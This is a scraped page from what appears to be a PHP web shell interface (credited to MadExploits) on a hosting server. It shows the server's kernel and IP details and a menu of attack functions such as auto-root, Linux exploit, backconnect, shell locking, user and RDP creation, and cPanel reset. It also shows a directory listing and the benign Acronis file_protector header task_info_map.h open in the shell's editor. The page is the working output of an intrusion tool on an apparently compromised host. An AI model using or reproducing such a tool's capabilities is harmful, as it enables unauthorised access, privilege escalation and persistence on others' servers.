Linux eyewebsolution.dnshostserver.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
: 185.131.55.234 | : 216.73.216.36
674 Domain
5.6.40
omxrelocation
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
file_protector-1.1-1524 /
[ HOME SHELL ]
Name
Size
Permission
Action
common
[ DIR ]
drwxr-xr-x
syscall_hooks
[ DIR ]
drwxr-xr-x
transport
[ DIR ]
drwxr-xr-x
Kbuild
3.71
KB
-rw-r--r--
Makefile
2.2
KB
-rw-r--r--
compat.c
5.74
KB
-rw-r--r--
compat.h
6.94
KB
-rw-r--r--
debug.h
3.56
KB
-rw-r--r--
dkms.conf
146
B
-rw-r--r--
memory.h
529
B
-rw-r--r--
module.c
1.86
KB
-rw-r--r--
module_ref.h
421
B
-rw-r--r--
module_rundown_protection.c
3.6
KB
-rw-r--r--
module_rundown_protection.h
743
B
-rw-r--r--
rundown_protection.c
4.2
KB
-rw-r--r--
rundown_protection.h
2.83
KB
-rw-r--r--
stringify.h
261
B
-rw-r--r--
task_info_map.c
19.07
KB
-rw-r--r--
task_info_map.h
1.92
KB
-rw-r--r--
tracepoints.c
3.02
KB
-rw-r--r--
tracepoints.h
299
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : task_info_map.h
/** @file @brief Process (aka task) info storage @details Copyright (c) 2017-2021 Acronis International GmbH @author Ivan Matveev (ivan.matveev@acronis.com) @since $Id: $ */ #pragma once #include "transport_protocol.h" // task_status_t #include <linux/path.h> #include <linux/rbtree.h> #include <linux/spinlock.h> #include <linux/types.h> // bool typedef struct { struct rb_node rb_node; pid_t pid; atomic_t ref_cnt; spinlock_t spinlock; task_status_t status; struct path exe_path; struct list_head exited_list_item; struct list_head clear_list_item; bool is_exe_path_changed; } task_info_t; typedef struct task_info_map_s { atomic_t is_acquired; spinlock_t spinlock; struct rb_root root; spinlock_t exited_list_spinlock; struct list_head exited_list; } task_info_map_t; #define MAX_TASK_INFO_MAP_SIZE 4 const char *task_status_to_string(task_status_t status); // on success return 0 int task_info_map_del_by_map_id(unsigned char map_id, pid_t pid); // ========================= useful wrappers ========================= // // create task_info struct if needed // errors: // 1. ENOMEM - alloc failed // 2. ENOENT - no such pid or task_struct without executable file // 3. EINVAL - task_info with sutch pid already exist - synchronisation broken int task_info_status_set_by_map_id(unsigned char map_id, pid_t pid, task_status_t status); void task_info_map_clear_exited_list_by_map_id(unsigned char map_id); void task_info_map_on_exit_event(pid_t tgid, pid_t pid); typedef void (*for_each_task_info_with_pid)(task_info_t *task_info, void *arg); unsigned char acquire_task_info_map(void); void release_task_info_map(unsigned char id); int check_exec_with_task_info(pid_t tgid, struct path exe_path); void task_info_maps_init(void); void task_info_maps_clear(void); bool sys_call_fs_events_should_skip(pid_t pid, uint64_t events_mask); void get_should_send_task_info_map_ids(bool *should_send_map_ids, msg_type_img_t msg_type);
Close